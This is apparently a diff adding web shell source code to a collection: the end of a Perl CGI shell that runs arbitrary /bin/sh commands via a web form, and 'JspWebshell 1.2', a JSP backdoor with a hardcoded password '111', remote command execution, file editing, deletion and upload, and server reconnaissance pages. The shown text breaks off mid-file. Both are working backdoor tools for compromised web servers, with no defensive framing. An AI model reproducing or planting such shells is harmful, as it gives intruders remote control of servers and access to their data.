+        $value =~ s/(\W)/sprintf('%%%02X', ord($1))/eg;
+    }
+    elsif ($format ne '') {
+        
+        die "unknown format: '$format'";
+    }
+    return [$value];
+}
+
+sub evaluate_variable {
+    my ($self, $variable, $keywords) = @_;
+    my $value = $keywords;
+    for my $name (split(/\./, $variable)) {
+        $value = $value->{$name};
+    }
+    return $value;
+}
+
+###############################################################################
+
+package WebShell::Script;
+
+use CGI;
+use CGI::Carp qw(fatalsToBrowser);
+use IPC::Open3;
+use Cwd;
+use POSIX;
+
+sub new {
+    my ($class) = @_;
+    my $self = bless { }, $class;
+    $self->initialize();
+    return $self;
+}
+
+sub query {
+    my ($self, @names) = @_;
+    my @values = ();
+    for my $name (@names) {
+        my $value = $self->{cgi}->param($name);
+        for ($value) { s/^\s+//; s/\s+$//; }
+        push @values, $value;
+    }
+    return wantarray ? @values : "@values";
+}
+
+sub initialize {
+    my ($self) = @_;
+    $self->{cgi} = new CGI;
+    $self->{cwd} = $self->{cgi}->cookie(-name => 'WebShell-cwd');
+    $self->{cwd} = cwd unless defined $self->{cwd};
+    $self->{cwd} = cwd if $WebShell::Configuration::restricted_mode;
+    $self->{login} = 0;
+    my $login = $self->{cgi}->cookie(-name => 'WebShell-login');
+    my $password = $self->query('password');
+    $self->{login} = 1
+            if crypt($WebShell::Configuration::password, $login."XX") eq $login;
+    $self->{login} = 1 if $password eq $WebShell::Configuration::password;
+}
+
+sub run {
+    my ($self) = @_;
+    return $self->login_action unless $self->{login};
+    my $action = $self->query('action');
+    $action = 'default' unless $action =~ /^\w+$/;
+    $action = $self->can($action . '_action');
+    $action = $self->can('default_action') unless defined $action;
+    $self->$action();
+}
+
+sub default_action {
+    my ($self) = @_;
+    $self->publish('INPUT');
+}
+
+sub login_action {
+    my ($self) = @_;
+    $self->publish('LOGIN', error => ($self->query('password') ne ''));
+}
+
+sub command {
+    my ($self, $command) = @_;
+    chdir($self->{cwd});
+    my $pid = open3(\*WRTH, \*RDH, \*ERRH, "/bin/sh");
+    print WRTH "$command\n";
+    close(WRTH);
+    my $output = do { local $/; <RDH> };
+    my $error = do { local $/; <ERRH> };
+    waitpid($pid, 0);
+    return ($output, $error);
+}
+
+sub forbidden_command {
+    my ($self, $command) = @_;
+    my $error = "This command is not available in the restricted mode.\n";
+    $error .= "You may only use the following commands:\n";
+    for my $ok_command (@$WebShell::Configuration::ok_commands) {
+        $error .= "    $ok_command\n";
+    }
+    return ('', $error);
+}
+
+sub cd_command {
+    my ($self, $command) = @_;
+    my $error;
+    my $directory = $1 if $command =~ /^cd\s+(\S+)$/;
+    warn "cwd: '$self->{cwd}'\n";
+    warn "command: '$command'\n";
+    warn "directory: '$directory'\n";
+    if ($directory ne '') {
+        $error = $! unless chdir($self->{cwd});
+        $error = $! unless chdir($directory);
+    }
+    $self->{cwd} = cwd;
+    return ('', $error);
+}
+
+sub execute_action {
+    my ($self) = @_;
+    my $command = $self->query('command');
+    my $user = getpwuid($>);
+    my $old_line = "[$user: $self->{cwd}]\$ $command";
+    my ($output, $error);
+    if ($command ne "") {
+        my $allow = not $WebShell::Configuration::restricted_mode;
+        for my $ok_command (@$WebShell::Configuration::ok_commands) {
+            $allow = 1 if $command eq $ok_command;
+        }
+        if ($allow) {
+            $command =~ /^(\w+)/;
+            if (my $method = $self->can("${1}_command")) {
+                ($output, $error) = $self->$method($command);
+            }
+            else {
+                ($output, $error) = $self->command($command);
+            }
+            
+        }
+        else {
+            ($output, $error) = $self->forbidden_command($command);
+        }
+    }
+    my $new_line = "[$user: $self->{cwd}]\$ " unless $command eq "";
+    $self->publish('EXECUTE',
+        old_line => $old_line, new_line => $new_line,
+        output => $output, error => $error);
+}
+
+sub browse_action {
+    my ($self) = @_;
+    my $error = "";
+    my $path = $self->query('path');
+    if ($WebShell::Configuration::restricted_mode and $path ne '') {
+        $error = "You cannot browse directories in the restricted mode.";
+        $path = "";
+    }
+    $error = $! unless chdir($self->{cwd});
+    if ($path ne '') {
+        $error = $! unless chdir($path);
+    }
+    $self->{cwd} = cwd;
+    opendir(DIR, '.');
+    my @dir = readdir(DIR);
+    closedir(DIR);
+    my @entries = ();
+    for my $name (@dir) {
+        my ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
+            $atime, $mtime, $ctime, $blksize, $blocks) = stat($name);
+        my $modestr = S_ISDIR($mode) ? 'd' : '-';
+        $modestr .= ($mode & S_IRUSR) ? 'r' : '-';
+        $modestr .= ($mode & S_IWUSR) ? 'w' : '-';
+        $modestr .= ($mode & S_ISUID) ? 's' : ($mode & S_IXUSR) ? 'x' : '-';
+        $modestr .= ($mode & S_IRGRP) ? 'r' : '-';
+        $modestr .= ($mode & S_IWGRP) ? 'w' : '-';
+        $modestr .= ($mode & S_ISGID) ? 's' : ($mode & S_IXGRP) ? 'x' : '-';
+        $modestr .= ($mode & S_IROTH) ? 'r' : '-';
+        $modestr .= ($mode & S_IWOTH) ? 'w' : '-';
+        $modestr .= ($mode & S_IXOTH) ? 'x' : '-';
+        my $userstr = getpwuid($uid);
+        my $groupstr = getgrgid($gid);
+        my $sizestr = ($size < 1024) ? $size :
+                        ($size < 1024*1024) ? sprintf("%.1fk", $size/1024) :
+                        sprintf("%.1fM", $size/(1024*1024));
+        my $timestr = strftime('%H:%M %b %e %Y', localtime($mtime));
+        push @entries, {
+            name => $name,
+            type_file => S_ISREG($mode),
+            type_dir => S_ISDIR($mode),
+            type_exec => ($mode & S_IXUSR),
+            mode => $modestr,
+            user => $userstr,
+            group => $groupstr,
+            order => (S_ISDIR($mode) ? 0 : 1) . $name,
+            all_rights => (-w $name),
+            size => $sizestr,
+            time => $timestr,
+        };
+    }
+    @entries = sort { $a->{order} cmp $b->{order} } @entries;
+    my @directory = ();
+    my $path = '';
+    for my $name (split m|/|, $self->{cwd}) {
+        $path .= "$name/";
+        push @directory, {
+            name => $name,
+            path => $path,
+        };
+    }
+    @directory = ({ name => '', path => '/'}) unless @directory;
+    $self->publish('BROWSE', entries => \@entries, directory => \@directory,
+            error => $error);
+}
+
+sub publish {
+    my ($self, $template, %keywords) = @_;
+    $template = eval '$WebShell::Templates::' . $template . '_TEMPLATE';
+    my $xit = new WebShell::MiniXIT;
+    my $text = $xit->substitute($template, %keywords);
+    $self->{cgi}->url =~ m{^http://([^/]*)(.*)/[^/]*$};
+    my $domain = $1;
+    my $path = $2;
+    my $cwd_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-cwd',
+        -value => $self->{cwd},
+        -domain => $domain,
+        -path => $path,
+    );
+    my $login = "";
+    if ($self->{login}) {
+        my $salt = join '',
+                ('.', '/', 0..9, 'A'..'Z', 'a'..'z')[rand 64, rand 64];
+        $login = crypt($WebShell::Configuration::password, $salt);
+    }
+    my $login_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-login',
+        -value => $login,
+        -domain => $domain,
+        -path => $path,
+    );
+    print $self->{cgi}->header(-cookie => [$cwd_cookie, $login_cookie]);
+    print $text;
+}
+
+###############################################################################
+
+package WebShell;
+
+my $script = new WebShell::Script;
+$script->run;
+
+###############################################################################
+###############################################################################

php/JspWebshell 1.2.php

@@ -0,0 +1,788 @@
+<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
+<%
+/**
+ * <p>Title:JspWebshell </p>
+ *
+ * <p>Description: jsp网站管理</p>
+ *
+ * <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
+ *
+ * <p>Company: zero.cnbct.org</p>
+ *  PS:本程序是小弟处于兴趣所写，如有疑问请联系QQ:48124012
+ * @version 1.2
+ */
+ String path="";
+ String selfName="";
+ boolean copyfinish=false;
+%>
+<%  selfName=request.getRequestURI();
+     // String editfile="";
+        String editfile=request.getParameter("editfile");
+		if (editfile!=null)
+		{editfile=new String(editfile.getBytes("ISO8859_1"));
+		}
+	  path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+%>
+<%!    
+    String _password ="111";//密码
+	public String readAllFile(String filePathName) throws IOException 
+	{ 
+	FileReader fr = new FileReader(filePathName); 
+	int count = fr.read();
+	String res="";
+	while(count != -1) 
+	{ 
+	//System.out.print((char)count); 
+		res=res+(char)count;
+	count = fr.read(); 
+	if(count == 13) 
+	{ 
+	fr.skip(1); 
+	} 
+	} 
+	fr.close(); 
+	return res;
+	} 
+public void writeFile(String filePathName,String args) throws IOException 
+{ 
+FileWriter fw = new FileWriter(filePathName); 
+PrintWriter out=new PrintWriter(fw); 
+out.write(args); 
+out.println(); 
+out.flush(); 
+fw.close(); 
+out.close(); 
+} 
+public boolean createFile(String filePathName) throws IOException 
+{ 
+boolean result = false; 
+File file = new File(filePathName); 
+if(file.exists()) 
+{ 
+System.out.println("文件已经存在！"); 
+} 
+else 
+{ 
+file.createNewFile(); 
+result = true; 
+System.out.println("文件已经创建！"); 
+} 
+return result; 
+}
+public boolean createFolder(String fileFolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(fileFolderName); 
+if(file.exists()) 
+{ 
+//file.delete(); 
+System.out.println("目录已经存在!"); 
+result = true; 
+} 
+else 
+{ 
+file.mkdir(); 
+System.out.println("目录已经建立!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+}  
+
+public boolean DeleteFolder(String filefolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(filefolderName); 
+if(file.exists()) 
+{ 
+file.delete(); 
+System.out.println("目录已删除!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+} 
+public boolean validate(String password) {
+	if (password.equals(_password)) {
+		return true;
+	} else {
+		return false;
+	}
+}
+public String HTMLEncode(String str) {
+	str = str.replaceAll(" ", "&nbsp;");
+	str = str.replaceAll("<", "&lt;");
+	str = str.replaceAll(">", "&gt;");
+	str = str.replaceAll("\r\n", "<br>");
+	
+	return str;
+}
+    public String exeCmd(String cmd) {
+	Runtime runtime = Runtime.getRuntime();
+	Process proc = null;
+	String retStr = "";
+	InputStreamReader insReader = null;
+	char[] tmpBuffer = new char[1024];
+	int nRet = 0;
+	
+	try {
+		proc = runtime.exec(cmd);
+		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+			retStr += new String(tmpBuffer, 0, nRet);
+		}
+		
+		insReader.close();
+		retStr = HTMLEncode(retStr);
+	} catch (Exception e) {
+		retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
+	} finally {
+		return retStr;
+	}
+	}
+	public boolean fileCopy(String srcPath, String dstPath) {
+	boolean bRet = true;
+	
+	try {
+		FileInputStream in = new FileInputStream(new File(srcPath));
+		FileOutputStream out = new FileOutputStream(new File(dstPath));
+		byte[] buffer = new byte[1024];
+		int nBytes;
+		
+
+		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+			out.write(buffer, 0, nBytes);
+		}
+		
+		in.close();
+		out.close();
+	} catch (IOException e) {
+		bRet = false;
+	}	
+	
+	return bRet;
+}
+class EnvServlet
+{
+	public long timeUse=0;
+	public Hashtable htParam=new Hashtable();
+	private Hashtable htShowMsg=new Hashtable();
+	public void setHashtable()
+	{
+		Properties me=System.getProperties();
+		Enumeration em=me.propertyNames();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=me.getProperty(strKey);
+			htParam.put(strKey,strValue);
+		}
+	}	
+	public void getHashtable(String strQuery)
+	{
+		Enumeration em=htParam.keys();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=new String();
+			if(strKey.indexOf(strQuery,0)>=0)
+			{
+				strValue=(String)htParam.get(strKey);
+				htShowMsg.put(strKey,strValue);
+			}
+		}
+	}
+	public String queryHashtable(String strKey)
+	{
+		strKey=(String)htParam.get(strKey);
+		return strKey;
+	}
+/*	public long test_int()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		while(i<3000000)i++;
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}
+	public long test_sqrt()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		double db=(double)new Random().nextInt(1000);
+		while(i<200000){db=Math.sqrt(db);i++;}
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}*/
+}
+%>
+<%
+	EnvServlet env=new EnvServlet();
+	env.setHashtable();
+	//String action=new String(" ");
+	//String act=new String("action");
+	//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
+%>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>JspWebShell By 绝对零度</title>
+<style>
+body {
+	font-size: 12px;
+	font-family: "宋体";
+	background-color: #666666;
+}
+A {
+	COLOR: black; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: black; TEXT-DECORATION: underline; none: 
+}
+td {
+	font-size: 12px;
+	font-family: "宋体";
+	color: #000000;
+}
+
+input.textbox {
+	border: black solid 1;
+	font-size: 12px;
+	height: 18px;
+}
+
+input.button {
+	font-size: 12px;
+	font-family: "宋体";
+	border: black solid 1;
+}
+
+td.datarows {
+	font-size: 12px;
+	font-family: "宋体";
+	height: 25px;
+	color: #000000;
+}
+.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript" type="text/JavaScript">
+<!--
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+//-->
+</script>
+</head>
+<body bgcolor="#666666">
+<%
+//session.setMaxInactiveInterval(_sessionOutTime * 60);
+String password=request.getParameter("password");
+if (password == null && session.getAttribute("password") == null) {
+
+%>
+
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px"> 
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr> 
+      <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr> 
+            <TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell 
+              version 1.2管理登录 :::...</b></font></TD>
+            <TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By 
+              绝对零度</FONT></TD>
+          </tr>
+          <form name="bctform" method="post">
+            <tr bgcolor="#999999"> 
+              <td height="30" colspan="2" align="center" class="td2"> 
+                <input name="password" type="password" class="textbox" id="Textbox" /> 
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> 
+              </td>
+            </tr>
+          </form>
+        </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+
+	} else {
+	
+	if (session.getAttribute("password") == null) {
+		
+		if (validate(password) == false) {
+			out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
+			out.close();
+			return;
+		}
+		
+		session.setAttribute("password", password);
+	} else {
+		password = (String)session.getAttribute("password");
+	}
+%>
+	<%
+		File tmpFile = null;
+		String delfile="";
+		String delfile1="";
+		String editpath="";
+		delfile1=request.getParameter("delfile");
+		editpath=request.getParameter("filepath");
+		if (delfile1!=null)
+		{delfile=new String(delfile1.getBytes("ISO8859_1"));
+		}
+        if ( delfile1!= null) {
+        //  out.print(delfile);
+	    	tmpFile = new File(delfile);
+		if (! tmpFile.delete()) {
+			out.print( "<font color=\"red\">删除失败</font><br>\n");
+			}
+			}
+%>
+  <%String editfilecontent=null;
+       String editfilecontent1=request.getParameter("content");
+	   // out.println(editfilecontent1);
+		//String save=request.getParameter("save");
+	   if (editfilecontent1!=null)
+	   {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
+          //   out.print(editfile);
+			//out.print(editfilecontent);
+            if (editfile!=null&editfilecontent!=null)
+			{try {writeFile(editfile,editfilecontent);}
+			 catch (Exception e) {out.print("写入失败");}
+			 out.print("写入成功");
+			}
+			%>
+<%request.setCharacterEncoding("GBK");%>
+<%//String editfile=request.getParameter("editfile");
+//out.print(editfile);
+if (request.getParameter("jsptz")!=null)
+{%>
+<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2"> 
+  <CENTER>
+  <table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+  <tr> 
+      <td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>      
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+          <tr bgcolor="#999999" height="22">
+		  <td width="130" bgcolor="#999999">&nbsp;服务器名</td>
+            <td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器操作系统</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%> 
+              <%=env.queryHashtable("sun.os.patch.level")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器操作系统类型</td>
+            <td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
+            <td>&nbsp;服务器操作系统模式</td>
+            <td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>位</td>
+          </tr>     
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器所在地区</td>
+            <td>&nbsp;<%=env.queryHashtable("user.country")%></td>
+            <td>&nbsp;服务器语言</td>
+            <td>&nbsp;<%=env.queryHashtable("user.language")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器时区</td>
+            <td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
+            <td>&nbsp;服务器时间</td>
+            <td>&nbsp;<%=new java.util.Date()%> </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器解译引擎</td>
+            <td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
+            <td width="130">&nbsp;服务器端口</td>
+            <td width="170">&nbsp;<%= request.getServerPort() %></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;当前用户</td>
+            <td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;用户目录</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td align=left>&nbsp;本文件实际路径</td>
+            <td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+    <table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+      <tr> 
+      <td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font> 
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu1'>
+		<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;名称</td>
+            <td width="50%" height="22">&nbsp;英文名称</td>
+            <td width="20%" height="22">&nbsp;版本</td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA运行环境名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA运行环境说明书名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA虚拟机名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA虚拟机说明书名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
+          </tr>
+		  <%
+		  	float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
+			float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
+			float fPercent=fFreeMemory/fTotalMemory*100;
+		  %>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVA虚拟机剩余内存：</td>
+            <td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M 
+            </td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVA虚拟机分配内存</td>
+            <td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M 
+            </td>
+          </tr>
+        </table>
+		  <table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;参数名称</td>
+            <td width="70%" height="22">&nbsp;参数路径</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.class.path </td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>	
+            </td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.home</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.endorsed.dirs</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.library.path</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%> 
+            </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.io.tmpdir</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+  <div id="testspeed" align="center"> </div>
+</CENTER></div>
+
+<%}
+else{
+if (editfile!=null)//if edit
+{
+%>
+<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1"> 
+  <table width="99%" height="232" border="0">
+    <tr> 
+      <td height="226"><form name="form2" method="post" action="">
+          <p align="center"> 地址：
+            <input name="editfile" type="text" value="<%=editfile%>" size="50">
+          </p>
+          <p align="center"> 
+            <textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
+            <input type="submit" name="Submit2" value="保存">
+          </p>
+        </form> </td>
+    </tr>
+  </table>
+  <p>&nbsp;</p></div>
+<%}
+else{%>
+
+<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
+  <tr bgcolor="#333333"> 
+    <td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell 
+      version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td colspan="4"> <font color="#000000"> 
+      <%
+	  File[] fs = File.listRoots();
+	  for (int i = 0; i < fs.length; i++){
+	  %>
+      <a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>) 
+      </a> 
+      <%}%>
+      </font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td height="10" colspan="4"> <font color="#000000"> 
+      <form name="form1" method="post" action="">
+        <input type="text" name="command" class="button">
+        <input type="submit" name="Submit" value="CMD命令执行" class="button">
+      </form>
+      </font> <p> 
+        <%
+		String cmd = "";
+		InputStream ins = null;
+		String result = "";		
+		if (request.getParameter("command") != null) {		
+			cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
+        <%=result == "" ? "&nbsp;" : result%> 
+        <%}%>
+       </td>
+  </tr>
+  <FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
+    <tr bgcolor="#999999"> 
+      <td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150"  SIZE="50" class="button"> 
+        <INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
+      <td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
+    </tr>
+  </FORM>
+  <%     String fileexe="";
+             String dir="";
+             String deldir=""; 
+			 String scrfile="";
+			 String dstfile="";
+			  fileexe=request.getParameter("fileexe");
+		     dir=request.getParameter("dir");
+			 deldir=request.getParameter("deldir");
+		     scrfile=request.getParameter("scrfile");
+			 dstfile=request.getParameter("dstfile");
+		  if (fileexe!=null)
+			{
+			//out.print(path+fileexe);
+			createFile(path+fileexe); 
+			}
+		  if (dir!=null)
+			{
+			//out.print(path+dir);
+			createFolder(path+dir); 
+			}
+		  if (deldir!=null)
+			{
+			//out.print(deldir);
+		    DeleteFolder(deldir); 
+			}
+			if (scrfile!=null&dstfile!=null)
+			{
+			//out.print(scrfile);
+			//out.print(dstfile);
+			copyfinish=fileCopy(scrfile, dstfile) ;
+			}
+			%>
+  <tr bgcolor="#CCCCCC"> 
+    <td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
+        文件夹名： 
+        <input name="dir" type="text" size="10" class="button">
+        <input type="submit" name="Submit3" value="新建目录" class="button">
+      </form></td>
+    <td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
+        文件名： 
+        <input name="fileexe" type="text" size="8" class="button">
+        <input type="submit" name="Submit4" value="新建文件" class="button">
+      </form></td>
+    <td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
+        文件<input name="scrfile" type="text" size="15"class="button">
+        复制到
+        <input name="dstfile" type="text" size="15" class="button">
+        <input type="submit" name="Submit5" value="复制" class="button">
+      </form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
+  </tr>
+  <%//上传
+             String tempfilename="";
+             String up=request.getParameter("up");
+			// String tempfilepath=request.getParameter("filepath");
+			// out.print(tempfilepath);
+			  if(up!=null)
+		  {
+	       tempfilename=(String)session.getId();
+          //String tempfilename=request.getParameter("file");
+          File f1=new File(tempfilepath,tempfilename);
+          int n;
+          try
+          {
+              InputStream in=request.getInputStream();
+              BufferedInputStream my_in=new BufferedInputStream(in);
+              FileOutputStream fout=new FileOutputStream(f1);
+              BufferedOutputStream my_out=new BufferedOutputStream(fout);
+              byte[] b=new byte[10000];
+              while((n=my_in.read(b))!=-1)
+              {
+                   my_out.write(b,0,n);
+              }
+              my_out.flush();
+              my_out.close();
+              fout.close();
+              my_in.close();
+              in.close();
+             // out.print("文件创建成功!<br>");
+          }
+          catch(IOException e)
+          {
+              out.print("文件创建失败!");
+          }
+          
+          try
+          {   
+              RandomAccessFile random1=new RandomAccessFile(f1,"r");
+              random1.readLine();
+              String filename=random1.readLine();
+              byte[] b=filename.getBytes("ISO-8859-1");
+              filename=new String(b);
+              int pointer=filename.lastIndexOf('\\');
+              filename=filename.substring(pointer+1,filename.length()-1);
+              File f2=new File(tempfilepath,filename);
+              RandomAccessFile random2=new RandomAccessFile(f2,"rw");
+              random1.seek(0);
+              for(int i=1; i<=4; i++)
+              {
+                   String tempstr=random1.readLine();
+              }
+              long startPoint=random1.getFilePointer();
+              random1.seek(random1.length());
+              long mark=random1.getFilePointer();
+              int j=0;
+              long endPoint=0;
+              while((mark>=0)&&(j<=5))
+              {
+                   mark--;
+                   random1.seek(mark);
+                   n=random1.readByte();
+                   if(n=='\n')
+
+                   {
+                         j++;
